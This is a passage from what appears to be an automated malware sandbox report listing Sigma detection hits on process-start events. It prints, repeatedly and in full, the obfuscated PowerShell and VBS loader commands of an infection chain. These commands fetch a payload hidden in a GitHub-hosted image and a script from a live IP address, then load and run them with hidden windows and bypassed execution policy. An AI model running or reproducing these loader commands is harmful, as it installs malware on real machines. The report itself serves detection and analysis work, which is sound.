{1}startIndex;{1}base64Command = {1}imageText.Substring({1}startIndex, {1}base64Length);{1}commandBytes = [System.Convert]::FromBase64String('+'{1}base64Command);{1}loadedAssembly = [System.Reflection.Assembly]'+'::Load({1}commandBytes)'+';{1}vaiMethod = [dnl'+'ib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.Invoke({1}null, @({0}txt.RDCCNM/055/831.922.571.701//:ptth{0}, {0}des'+'ativado{0}, {0}desativado{0'+'}, {0}desativado{0}, {0}RegAsm'+'{0}, {0}desativado{0}, {0}desativado{0}));') -F[chAR]39,[chAR]36) )", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJFNoRUxMSWR
                      Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $ShELLId[1]+$shElLID[13]+'X')( (('{1}imageUrl = {0}https://raw.githubusercontent.com/CryptersAndToolsOf'+'icial/ZIP/refs/heads/main/DetahNote_V.jpg {0};{1}webClient = New-Object System.Net.WebClient;{'+'1}imageBytes = {1}'+'webClient.Do'+'wnloadData({1}imageUrl);{1}imageText = [S'+'ystem.Text.Enco'+'ding]::UTF8.GetString({1}imageBytes);{1}startFlag = {0}<<BASE64_START'+'>>{0};{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}i'+'mageText.Inde'+'x'+'Of({1}en'+'dFlag);{1}startIndex -ge 0 -and {1}endIndex -g'+'t'+' {1}s'+'tartIndex;{1}startIndex += {1}startFlag.Length;{1}base64Length = {1}endIndex - {1}startIndex;{1}base64Command = {1}imageText.Substring({1}startIndex, {1}base64Length);{1}commandBytes = [System.Convert]::FromBase64String('+'{1}base64Command);{1}loadedAssembly = [System.Reflection.Assembly]'+'::Load({1}commandBytes)'+';{1}vaiMethod = [dnl'+'ib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.Invoke({1}null, @({0}txt.RDCCNM/055/831.922.571.701//:ptth{0}, {0}des'+'ativado{0}, {0}desativado{0'+'}, {0}desativado{0}, {0}RegAsm'+'{0}, {0}desativado{0}, {0}desativado{0}));') -F[chAR]39,[chAR]36) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $ShELLId[1]+$shElLID[13]+'X')( (('{1}imageUrl = {0}https://raw.githubusercontent.com/CryptersAndToolsOf'+'icial/ZIP/refs/heads/main/DetahNote_V.jpg {0};{1}webClient = New-Object System.Net.WebClient;{'+'1}imageBytes = {1}'+'webClient.Do'+'wnloadData({1}imageUrl);{1}imageText = [S'+'ystem.Text.Enco'+'ding]::UTF8.GetString({1}imageBytes);{1}startFlag = {0}<<BASE64_START'+'>>{0};{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}i'+'mageText.Inde'+'x'+'Of({1}en'+'dFlag);{1}startIndex -ge 0 -and {1}endIndex -g'+'t'+' {1}s'+'tartIndex;{1}startIndex += {1}startFlag.Length;{1}base64Length = {1}endIndex - {1}startIndex;{1}base64Command = {1}imageText.Substring({1}startIndex, {1}base64Length);{1}commandBytes = [System.Convert]::FromBase64String('+'{1}base64Command);{1}loadedAssembly = [System.Reflection.Assembly]'+'::Load({1}commandBytes)'+';{1}vaiMethod = [dnl'+'ib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.Invoke({1}null, @({0}txt.RDCCNM/055/831.922.571.701//:ptth{0}, {0}des'+'ativado{0}, {0}desativado{0'+'}, {0}desativado{0}, {0}RegAsm'+'{0}, {0}desativado{0}, {0}desativado{0}));') -F[chAR]39,[chAR]36) )", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJFNoRUxMSWR
                      Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $ShELLId[1]+$shElLID[13]+'X')( (('{1}imageUrl = {0}https://raw.githubusercontent.com/CryptersAndToolsOf'+'icial/ZIP/refs/heads/main/DetahNote_V.jpg {0};{1}webClient = New-Object System.Net.WebClient;{'+'1}imageBytes = {1}'+'webClient.Do'+'wnloadData({1}imageUrl);{1}imageText = [S'+'ystem.Text.Enco'+'ding]::UTF8.GetString({1}imageBytes);{1}startFlag = {0}<<BASE64_START'+'>>{0};{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}i'+'mageText.Inde'+'x'+'Of({1}en'+'dFlag);{1}startIndex -ge 0 -and {1}endIndex -g'+'t'+' {1}s'+'tartIndex;{1}startIndex += {1}startFlag.Length;{1}base64Length = {1}endIndex - {1}startIndex;{1}base64Command = {1}imageText.Substring({1}startIndex, {1}base64Length);{1}commandBytes = [System.Convert]::FromBase64String('+'{1}base64Command);{1}loadedAssembly = [System.Reflection.Assembly]'+'::Load({1}commandBytes)'+';{1}vaiMethod = [dnl'+'ib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.Invoke({1}null, @({0}txt.RDCCNM/055/831.922.571.701//:ptth{0}, {0}des'+'ativado{0}, {0}desativado{0'+'}, {0}desativado{0}, {0}RegAsm'+'{0}, {0}desativado{0}, {0}desativado{0}));') -F[chAR]39,[chAR]36) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $ShELLId[1]+$shElLID[13]+'X')( (('{1}imageUrl = {0}https://raw.githubusercontent.com/CryptersAndToolsOf'+'icial/ZIP/refs/heads/main/DetahNote_V.jpg {0};{1}webClient = New-Object System.Net.WebClient;{'+'1}imageBytes = {1}'+'webClient.Do'+'wnloadData({1}imageUrl);{1}imageText = [S'+'ystem.Text.Enco'+'ding]::UTF8.GetString({1}imageBytes);{1}startFlag = {0}<<BASE64_START'+'>>{0};{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}i'+'mageText.Inde'+'x'+'Of({1}en'+'dFlag);{1}startIndex -ge 0 -and {1}endIndex -g'+'t'+' {1}s'+'tartIndex;{1}startIndex += {1}startFlag.Length;{1}base64Length = {1}endIndex - {1}startIndex;{1}base64Command = {1}imageText.Substring({1}startIndex, {1}base64Length);{1}commandBytes = [System.Convert]::FromBase64String('+'{1}base64Command);{1}loadedAssembly = [System.Reflection.Assembly]'+'::Load({1}commandBytes)'+';{1}vaiMethod = [dnl'+'ib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.Invoke({1}null, @({0}txt.RDCCNM/055/831.922.571.701//:ptth{0}, {0}des'+'ativado{0}, {0}desativado{0'+'}, {0}desativado{0}, {0}RegAsm'+'{0}, {0}desativado{0}, {0}desativado{0}));') -F[chAR]39,[chAR]36) )", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJFNoRUxMSWR
                      Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $ShELLId[1]+$shElLID[13]+'X')( (('{1}imageUrl = {0}https://raw.githubusercontent.com/CryptersAndToolsOf'+'icial/ZIP/refs/heads/main/DetahNote_V.jpg {0};{1}webClient = New-Object System.Net.WebClient;{'+'1}imageBytes = {1}'+'webClient.Do'+'wnloadData({1}imageUrl);{1}imageText = [S'+'ystem.Text.Enco'+'ding]::UTF8.GetString({1}imageBytes);{1}startFlag = {0}<<BASE64_START'+'>>{0};{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}i'+'mageText.Inde'+'x'+'Of({1}en'+'dFlag);{1}startIndex -ge 0 -and {1}endIndex -g'+'t'+' {1}s'+'tartIndex;{1}startIndex += {1}startFlag.Length;{1}base64Length = {1}endIndex - {1}startIndex;{1}base64Command = {1}imageText.Substring({1}startIndex, {1}base64Length);{1}commandBytes = [System.Convert]::FromBase64String('+'{1}base64Command);{1}loadedAssembly = [System.Reflection.Assembly]'+'::Load({1}commandBytes)'+';{1}vaiMethod = [dnl'+'ib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.Invoke({1}null, @({0}txt.RDCCNM/055/831.922.571.701//:ptth{0}, {0}des'+'ativado{0}, {0}desativado{0'+'}, {0}desativado{0}, {0}RegAsm'+'{0}, {0}desativado{0}, {0}desativado{0}));') -F[chAR]39,[chAR]36) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $ShELLId[1]+$shElLID[13]+'X')( (('{1}imageUrl = {0}https://raw.githubusercontent.com/CryptersAndToolsOf'+'icial/ZIP/refs/heads/main/DetahNote_V.jpg {0};{1}webClient = New-Object System.Net.WebClient;{'+'1}imageBytes = {1}'+'webClient.Do'+'wnloadData({1}imageUrl);{1}imageText = [S'+'ystem.Text.Enco'+'ding]::UTF8.GetString({1}imageBytes);{1}startFlag = {0}<<BASE64_START'+'>>{0};{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}i'+'mageText.Inde'+'x'+'Of({1}en'+'dFlag);{1}startIndex -ge 0 -and {1}endIndex -g'+'t'+' {1}s'+'tartIndex;{1}startIndex += {1}startFlag.Length;{1}base64Length = {1}endIndex - {1}startIndex;{1}base64Command = {1}imageText.Substring({1}startIndex, {1}base64Length);{1}commandBytes = [System.Convert]::FromBase64String('+'{1}base64Command);{1}loadedAssembly = [System.Reflection.Assembly]'+'::Load({1}commandBytes)'+';{1}vaiMethod = [dnl'+'ib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.Invoke({1}null, @({0}txt.RDCCNM/055/831.922.571.701//:ptth{0}, {0}des'+'ativado{0}, {0}desativado{0'+'}, {0}desativado{0}, {0}RegAsm'+'{0}, {0}desativado{0}, {0}desativado{0}));') -F[chAR]39,[chAR]36) )", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJFNoRUxMSWR
                      Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $ShELLId[1]+$shElLID[13]+'X')( (('{1}imageUrl = {0}https://raw.githubusercontent.com/CryptersAndToolsOf'+'icial/ZIP/refs/heads/main/DetahNote_V.jpg {0};{1}webClient = New-Object System.Net.WebClient;{'+'1}imageBytes = {1}'+'webClient.Do'+'wnloadData({1}imageUrl);{1}imageText = [S'+'ystem.Text.Enco'+'ding]::UTF8.GetString({1}imageBytes);{1}startFlag = {0}<<BASE64_START'+'>>{0};{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}i'+'mageText.Inde'+'x'+'Of({1}en'+'dFlag);{1}startIndex -ge 0 -and {1}endIndex -g'+'t'+' {1}s'+'tartIndex;{1}startIndex += {1}startFlag.Length;{1}base64Length = {1}endIndex - {1}startIndex;{1}base64Command = {1}imageText.Substring({1}startIndex, {1}base64Length);{1}commandBytes = [System.Convert]::FromBase64String('+'{1}base64Command);{1}loadedAssembly = [System.Reflection.Assembly]'+'::Load({1}commandBytes)'+';{1}vaiMethod = [dnl'+'ib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.Invoke({1}null, @({0}txt.RDCCNM/055/831.922.571.701//:ptth{0}, {0}des'+'ativado{0}, {0}desativado{0'+'}, {0}desativado{0}, {0}RegAsm'+'{0}, {0}desativado{0}, {0}desativado{0}));') -F[chAR]39,[chAR]36) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $ShELLId[1]+$shElLID[13]+'X')( (('{1}imageUrl = {0}https://raw.githubusercontent.com/CryptersAndToolsOf'+'icial/ZIP/refs/heads/main/DetahNote_V.jpg {0};{1}webClient = New-Object System.Net.WebClient;{'+'1}imageBytes = {1}'+'webClient.Do'+'wnloadData({1}imageUrl);{1}imageText = [S'+'ystem.Text.Enco'+'ding]::UTF8.GetString({1}imageBytes);{1}startFlag = {0}<<BASE64_START'+'>>{0};{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}i'+'mageText.Inde'+'x'+'Of({1}en'+'dFlag);{1}startIndex -ge 0 -and {1}endIndex -g'+'t'+' {1}s'+'tartIndex;{1}startIndex += {1}startFlag.Length;{1}base64Length = {1}endIndex - {1}startIndex;{1}base64Command = {1}imageText.Substring({1}startIndex, {1}base64Length);{1}commandBytes = [System.Convert]::FromBase64String('+'{1}base64Command);{1}loadedAssembly = [System.Reflection.Assembly]'+'::Load({1}commandBytes)'+';{1}vaiMethod = [dnl'+'ib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.Invoke({1}null, @({0}txt.RDCCNM/055/831.922.571.701//:ptth{0}, {0}des'+'ativado{0}, {0}desativado{0'+'}, {0}desativado{0}, {0}RegAsm'+'{0}, {0}desativado{0}, {0}desativado{0}));') -F[chAR]39,[chAR]36) )", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJFNoRUxMSWR
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestpicturewithgreatthingsinlinea.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestpicturewithgreatthingsinlinea.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\sysTEM32\WInDOwSpoWershELL\v1.0\pOWERSHELl.EXE" "pOweRSHell.eXE -eX ByPASS -nOp -W 1 -C DeviCEcreDentIALDePLoymENt.Exe ; ieX($(iEx('[sYstem.teXT.EnCodiNg]'+[CHaR]0X3A+[ChAr]0X3a+'utf8.geTStRIng([SYSTem.conVeRT]'+[cHar]0X3a+[cHAr]0x3a+'fRoMbAse64STRINg('+[chAr]0x22+'JFo4ViAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1CRVJERWZJTmlUaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTU9OLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrRlJJT2lCTCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9DWWksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvcUxvWVAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTUR1anZLSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENJWW9nV3RNZXIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAicXJVa0NtTXZhTkgiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZVNwQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYZEJMQnd6U21nZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFo4Vjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzUuMjI5LjEzOC81NTAvc2VldGhlYmVzdHBpY3R1cmV3aXRoZ3JlYXR0aGluZ3NpbmxpbmVhbHdheXMudElGIiwiJEVudjpBUFBEQVRBXHNlZXRoZWJlc3RwaWN0dXJld2l0aGdyZWF0dGhpbmdzaW5saW5lYS52YlMiLDAsMCk7c1RhcnQtU0xFZVAoMyk7U3RhclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2VldGhlYmVzdHBpY3R1cmV3aXRoZ3JlYXR0aGluZ3NpbmxpbmVhLnZiUyI='+[char]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4408, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestpicturewithgreatthingsinlinea.vbS" , ProcessId: 1396, ProcessName: wscript.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJFNoRUxMSWRbMV0rJHNoRWxMSURbMTNdKydYJykoICgoJ3sxfWltYWdlVXJsID0gezB9aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL0NyeXB0ZXJzQW5kVG9vbHNPZicrJ2ljaWFsL1pJUC9yZWZzL2hlYWRzL21haW4vRGV0YWhOb3RlX1YuanBnIHswfTt7MX13ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3snKycxfWltYWdlQnl0ZXMgPSB7MX0nKyd3ZWJDbGllbnQuRG8nKyd3bmxvYWREYXRhKHsxfWltYWdlVXJsKTt7MX1pbWFnZVRleHQgPSBbUycrJ3lzdGVtLlRleHQuRW5jbycrJ2RpbmddOjpVVEY4LkdldFN0cmluZyh7MX1pbWFnZUJ5dGVzKTt7MX1zdGFydEZsYWcgPSB7MH08PEJBU0U2NF9TVEFSVCcrJz4+ezB9O3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnswfTt7MX1zdGFydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9IHsxfWknKydtYWdlVGV4dC5JbmRlJysneCcrJ09mKHsxfWVuJysnZEZsYWcpO3sxfXN0YXJ0SW5kZXggLWdlIDAgLWFuZCB7MX1lbmRJbmRleCAtZycrJ3QnKycgezF9cycrJ3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7ezF9YmFzZTY0TGVuZ3RoID0gezF9ZW5kSW5kZXggLSB7MX1zdGFydEluZGV4O3sxfWJhc2U2NENvbW1hbmQgPSB7MX1pbWFnZVRleHQuU3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnKyd7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV0nKyc6OkxvYWQoezF9Y29tbWFuZEJ5dGVzKScrJzt7MX12YWlNZXRob2QgPSBbZG5sJysnaWIuSU8uSG9tZV0uR2V0TWV0aG9kKHswfVZBSXswfSk7ezF9dmFpTWV0aG9kLkludm9rZSh7MX1udWxsLCBAKHswfXR4dC5SRENDTk0vMDU1LzgzMS45MjIuNTcxLjcwMS8vOnB0dGh7MH0sIHswfWRlcycrJ2F0aXZhZG97MH0sIHswfWRlc2F0aXZhZG97MCcrJ30sIHswfWRlc2F0aXZhZG97MH0sIHswfVJlZ0FzbScrJ3swfSwgezB9ZGVzYXRpdmFkb3swfSwgezB9ZGVzYXRpdmFkb3swfSkpOycpICAtRltjaEFSXTM5LFtjaEFSXTM2KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJFNoRUxMSWRbMV0rJHNoRWxMSURbMTNdKydYJykoICgoJ3sxfWltYWdlVXJsID0gezB9aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL0NyeXB0ZXJzQW5kVG9vbHNPZicrJ2ljaWFsL1pJUC9yZWZzL2hlYWRzL21haW4vRGV0YWhOb3RlX1YuanBnIHswfTt7MX13ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3snKycxfWltYWdlQnl0ZXMgPSB7MX0nKyd3ZWJDbGllbnQuRG8nKyd3bmxvYWREYXRhKHsxfWltYWdlVXJsKTt7MX1pbWFnZVRleHQgPSBbUycrJ3lzdGVtLlRleHQuRW5jbycrJ2RpbmddOjpVVEY4LkdldFN0cmluZyh7MX1pbWFnZUJ5dGVzKTt7MX1zdGFydEZsYWcgPSB7MH08PEJBU0U2NF9TVEFSVCcrJz4+ezB9O3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnswfTt7MX1zdGFydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9IHsxfWknKydtYWdlVGV4dC5JbmRlJysneCcrJ09mKHsxfWVuJysnZEZsYWcpO3sxfXN0YXJ0SW5kZXggLWdlIDAgLWFuZCB7MX1lbmRJbmRleCAtZycrJ3QnKycgezF9cycrJ3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7ezF9YmFzZTY0TGVuZ3RoID0gezF9ZW5kSW5kZXggLSB7MX1zdGFydEluZGV4O3sxfWJhc2U2NENvbW1hbmQgPSB7MX1pbWFnZVRleHQuU3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygn
                      Source: Process startedAuthor: pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJFNoRUxMSWRbMV0rJHNoRWxMSURbMTNdKydYJykoICgoJ3sxfWltYWdlVXJsID0gezB9aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL0NyeXB0ZXJzQW5kVG9vbHNPZicrJ2ljaWFsL1pJUC9yZWZzL2hlYWRzL21haW4vRGV0YWhOb3RlX1YuanBnIHswfTt7MX13ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3snKycxfWltYWdlQnl0ZXMgPSB7MX0nKyd3ZWJDbGllbnQuRG8nKyd3bmxvYWREYXRhKHsxfWltYWdlVXJsKTt7MX1pbWFnZVRleHQgPSBbUycrJ3lzdGVtLlRleHQuRW5jbycrJ2RpbmddOjpVVEY4LkdldFN0cmluZyh7MX1pbWFnZUJ5dGVzKTt7MX1zdGFydEZsYWcgPSB7MH08PEJBU0U2NF9TVEFSVCcrJz4+ezB9O3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnswfTt7MX1zdGFydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9IHsxfWknKydtYWdlVGV4dC5JbmRlJysneCcrJ09mKHsxfWVuJysnZEZsYWcpO3sxfXN0YXJ0SW5kZXggLWdlIDAgLWFuZCB7MX1lbmRJbmRleCAtZycrJ3QnKycgezF9cycrJ3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7ezF9YmFzZTY0TGVuZ3RoID0gezF9ZW5kSW5kZXggLSB7MX1zdGFydEluZGV4O3sxfWJhc2U2NENvbW1hbmQgPSB7MX1pbWFnZVRleHQuU3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnKyd7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV0nKyc6OkxvYWQoezF9Y29tbWFuZEJ5dGVzKScrJzt7MX12YWlNZXRob2QgPSBbZG5sJysnaWIuSU8uSG9tZV0uR2V0TWV0aG9kKHswfVZBSXswfSk7ezF9dmFpTWV0aG9kLkludm9rZSh7MX1udWxsLCBAKHswfXR4dC5SRENDTk0vMDU1LzgzMS45MjIuNTcxLjcwMS8vOnB0dGh7MH0sIHswfWRlcycrJ2F0aXZhZG97MH0sIHswfWRlc2F0aXZhZG97MCcrJ30sIHswfWRlc2F0aXZhZG97MH0sIHswfVJlZ0FzbScrJ3swfSwgezB9ZGVzYXRpdmFkb3swfSwgezB9ZGVzYXRpdmFkb3swfSkpOycpICAtRltjaEFSXTM5LFtjaEFSXTM2KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJFNoRUxMSWRbMV0rJHNoRWxMSURbMTNdKydYJykoICgoJ3sxfWltYWdlVXJsID0gezB9aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL0NyeXB0ZXJzQW5kVG9vbHNPZicrJ2ljaWFsL1pJUC9yZWZzL2hlYWRzL21haW4vRGV0YWhOb3RlX1YuanBnIHswfTt7MX13ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3snKycxfWltYWdlQnl0ZXMgPSB7MX0nKyd3ZWJDbGllbnQuRG8nKyd3bmxvYWREYXRhKHsxfWltYWdlVXJsKTt7MX1pbWFnZVRleHQgPSBbUycrJ3lzdGVtLlRleHQuRW5jbycrJ2RpbmddOjpVVEY4LkdldFN0cmluZyh7MX1pbWFnZUJ5dGVzKTt7MX1zdGFydEZsYWcgPSB7MH08PEJBU0U2NF9TVEFSVCcrJz4+ezB9O3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnswfTt7MX1zdGFydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9IHsxfWknKydtYWdlVGV4dC5JbmRlJysneCcrJ09mKHsxfWVuJysnZEZsYWcpO3sxfXN0YXJ0SW5kZXggLWdlIDAgLWFuZCB7MX1lbmRJbmRleCAtZycrJ3QnKycgezF9cycrJ3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7ezF9YmFzZTY0TGVuZ3RoID0gezF9ZW5kSW5kZXggLSB7MX1zdGFydEluZGV4O3sxfWJhc2U2NENvbW1hbmQgPSB7MX1pbWFnZVRleHQuU3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dGV